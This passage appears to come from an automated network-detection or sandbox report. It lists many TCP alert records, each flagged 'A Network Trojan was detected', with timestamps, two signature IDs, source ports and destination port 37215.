                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.498447
                  SID:2835222
                  Source Port:37648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.850530
                  SID:2829579
                  Source Port:56770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.135907
                  SID:2829579
                  Source Port:55976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366759
                  SID:2835222
                  Source Port:46042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.276470
                  SID:2835222
                  Source Port:43816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.920289
                  SID:2835222
                  Source Port:57658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.021339
                  SID:2829579
                  Source Port:34544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.197081
                  SID:2835222
                  Source Port:38634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.576208
                  SID:2835222
                  Source Port:60384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.984415
                  SID:2829579
                  Source Port:53868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.091176
                  SID:2835222
                  Source Port:44102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.594694
                  SID:2829579
                  Source Port:37962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.973887
                  SID:2829579
                  Source Port:47068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.613103
                  SID:2835222
                  Source Port:53726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.520220
                  SID:2835222
                  Source Port:44758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.560985
                  SID:2829579
                  Source Port:34922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.888378
                  SID:2829579
                  Source Port:51234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.179104
                  SID:2829579
                  Source Port:43488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.024550
                  SID:2835222
                  Source Port:56152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.329520
                  SID:2829579
                  Source Port:56454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.860796
                  SID:2829579
                  Source Port:45076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.290610
                  SID:2835222
                  Source Port:54210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.539034
                  SID:2829579
                  Source Port:49126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758809
                  SID:2835222
                  Source Port:51092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.411505
                  SID:2829579
                  Source Port:58990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.425072
                  SID:2835222
                  Source Port:55502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.160645
                  SID:2835222
                  Source Port:55648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.914278
                  SID:2835222
                  Source Port:59522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.541025
                  SID:2829579
                  Source Port:45168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.759865
                  SID:2835222
                  Source Port:35868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.720199
                  SID:2829579
                  Source Port:42578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.340443
                  SID:2835222
                  Source Port:51104
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.985222
                  SID:2835222
                  Source Port:45566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.079393
                  SID:2835222
                  Source Port:37384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.303289
                  SID:2835222
                  Source Port:56240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.798574
                  SID:2829579
                  Source Port:54490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.853206
                  SID:2829579
                  Source Port:52660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.585951
                  SID:2829579
                  Source Port:43818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.775539
                  SID:2835222
                  Source Port:40460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.186455
                  SID:2829579
                  Source Port:57700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.965064
                  SID:2835222
                  Source Port:50234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.621614
                  SID:2829579
                  Source Port:56044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.364210
                  SID:2835222
                  Source Port:44708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.365317
                  SID:2829579
                  Source Port:60552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.442977
                  SID:2829579
                  Source Port:41758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.628977
                  SID:2829579
                  Source Port:36360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.837168
                  SID:2829579
                  Source Port:60808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.422019
                  SID:2835222
                  Source Port:41816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.288154
                  SID:2829579
                  Source Port:35362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.944387
                  SID:2829579
                  Source Port:48046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.767946
                  SID:2835222
                  Source Port:33072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.962913
                  SID:2835222
                  Source Port:41686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.245550
                  SID:2829579
                  Source Port:38546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.079097
                  SID:2835222
                  Source Port:49712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.039541
                  SID:2829579
                  Source Port:56296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.452123
                  SID:2835222
                  Source Port:38054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.856622
                  SID:2835222
                  Source Port:56442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.593828
                  SID:2835222
                  Source Port:41984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.898943
                  SID:2829579
                  Source Port:44574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.481164
                  SID:2829579
                  Source Port:51622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.894187
                  SID:2835222
                  Source Port:57162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.828226
                  SID:2835222
                  Source Port:56192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.792052
                  SID:2835222
                  Source Port:38448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.948398
                  SID:2835222
                  Source Port:43948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.789365
                  SID:2835222
                  Source Port:49226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.799861
                  SID:2829579
                  Source Port:59630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.763647
                  SID:2835222
                  Source Port:50192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641375
                  SID:2835222
                  Source Port:51688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.265818
                  SID:2835222
                  Source Port:58920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.477553
                  SID:2829579
                  Source Port:32884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.931040
                  SID:2835222
                  Source Port:42808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.538394
                  SID:2835222
                  Source Port:51260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.447222
                  SID:2829579
                  Source Port:42056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.901801
                  SID:2835222
                  Source Port:33700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.419826
                  SID:2829579
                  Source Port:34146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.490587
                  SID:2829579
                  Source Port:38968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.231574
                  SID:2829579
                  Source Port:41714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.288558
                  SID:2835222
                  Source Port:54608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.426350
                  SID:2835222
                  Source Port:57940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.512743
                  SID:2829579
                  Source Port:38256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.865951
                  SID:2829579
                  Source Port:33490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.216588
                  SID:2835222
                  Source Port:38038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.437180
                  SID:2829579
                  Source Port:37904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.107165
                  SID:2835222
                  Source Port:60700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.903696
                  SID:2835222
                  Source Port:57732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.389316
                  SID:2829579
                  Source Port:53892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.315486
                  SID:2835222
                  Source Port:41132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.784447
                  SID:2835222
                  Source Port:39946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.127595
                  SID:2835222
                  Source Port:46890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.566152
                  SID:2835222
                  Source Port:48416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.011298
                  SID:2835222
                  Source Port:41032
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.076380
                  SID:2829579
                  Source Port:54486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.186612
                  SID:2829579
                  Source Port:44350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.879278
                  SID:2835222
                  Source Port:33632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.873718
                  SID:2835222
                  Source Port:55690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.848557
                  SID:2829579
                  Source Port:46348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.061438
                  SID:2829579
                  Source Port:35666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.489680
                  SID:2835222
                  Source Port:58250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.102149
                  SID:2829579
                  Source Port:44994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.329949
                  SID:2835222
                  Source Port:49970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.863618
                  SID:2835222
                  Source Port:35868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.573004
                  SID:2829579
                  Source Port:43820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589872
                  SID:2829579
                  Source Port:51292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.651021
                  SID:2829579
                  Source Port:41310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.699578
                  SID:2835222
                  Source Port:36078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.977821
                  SID:2835222
                  Source Port:43122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.829677
                  SID:2835222
                  Source Port:51940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.209025
                  SID:2829579
                  Source Port:32870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.900161
                  SID:2835222
                  Source Port:34024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.869693
                  SID:2829579
                  Source Port:45760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.271006
                  SID:2829579
                  Source Port:60440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.413827
                  SID:2835222
                  Source Port:45138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.714524
                  SID:2829579
                  Source Port:36946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.596186
                  SID:2829579
                  Source Port:48588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.420530
                  SID:2829579
                  Source Port:46200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.995809
                  SID:2829579
                  Source Port:48986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.025599
                  SID:2835222
                  Source Port:55756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559678
                  SID:2829579
                  Source Port:36554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589872
                  SID:2835222
                  Source Port:58624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.462575
                  SID:2835222
                  Source Port:45556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.777569
                  SID:2835222
                  Source Port:55454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.931354
                  SID:2835222
                  Source Port:55960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.392939
                  SID:2835222
                  Source Port:44652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.754547
                  SID:2829579
                  Source Port:49642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.811760
                  SID:2829579
                  Source Port:49386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.655011
                  SID:2835222
                  Source Port:36830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.528287
                  SID:2835222
                  Source Port:55512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.414993
                  SID:2835222
                  Source Port:35750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.395697
                  SID:2835222
                  Source Port:60604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.868107
                  SID:2829579
                  Source Port:44944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.462322
                  SID:2829579
                  Source Port:45002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.538749
                  SID:2829579
                  Source Port:34600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.993548
                  SID:2835222
                  Source Port:43026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.976688
                  SID:2829579
                  Source Port:36450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.375858
                  SID:2829579
                  Source Port:59136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.300149
                  SID:2829579
                  Source Port:52006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.569815
                  SID:2829579
                  Source Port:36676
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.082325
                  SID:2835222
                  Source Port:44192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.623766
                  SID:2829579
                  Source Port:47946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.900911
                  SID:2829579
                  Source Port:56990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.845573
                  SID:2829579
                  Source Port:45648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.562058
                  SID:2835222
                  Source Port:48784
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.736564
                  SID:2829579
                  Source Port:44170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.522257
                  SID:2835222
                  Source Port:54088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.403312
                  SID:2829579
                  Source Port:52372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.335427
                  SID:2835222
                  Source Port:46466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.484037
                  SID:2835222
                  Source Port:42804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.835000
                  SID:2829579
                  Source Port:53994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.175593
                  SID:2835222
                  Source Port:34148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.822867
                  SID:2829579
                  Source Port:59804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.556012
                  SID:2829579
                  Source Port:36700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.382964
                  SID:2835222
                  Source Port:43092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.948745
                  SID:2835222
                  Source Port:44642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.912574
                  SID:2835222
                  Source Port:56720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.740635
                  SID:2835222
                  Source Port:55184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.569394
                  SID:2829579
                  Source Port:55424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2835222
                  Source Port:46744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.529956
                  SID:2829579
                  Source Port:39372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.646425
                  SID:2829579
                  Source Port:45414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810148
                  SID:2829579
                  Source Port:48766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.553494
                  SID:2835222
                  Source Port:38646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.064051
                  SID:2829579
                  Source Port:56956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.072676
                  SID:2829579
                  Source Port:33298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.252785
                  SID:2835222
                  Source Port:43244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.874680
                  SID:2835222
                  Source Port:59646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.743815
                  SID:2829579
                  Source Port:53526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.649894
                  SID:2835222
                  Source Port:40614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.062553
                  SID:2829579
                  Source Port:58054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.019463
                  SID:2835222
                  Source Port:58834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.493980
                  SID:2835222
                  Source Port:41918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.770173
                  SID:2829579
                  Source Port:45580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.513250
                  SID:2835222
                  Source Port:51582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.836233
                  SID:2829579
                  Source Port:50064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.908970
                  SID:2829579
                  Source Port:58598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.360287
                  SID:2835222
                  Source Port:44360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.396195
                  SID:2829579
                  Source Port:34864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.297921
                  SID:2829579
                  Source Port:57532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.327774
                  SID:2829579
                  Source Port:38714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.375849
                  SID:2835222
                  Source Port:35128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.453359
                  SID:2835222
                  Source Port:45152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.656959
                  SID:2829579
                  Source Port:46744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.554862
                  SID:2835222
                  Source Port:57944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.716127
                  SID:2829579
                  Source Port:56374
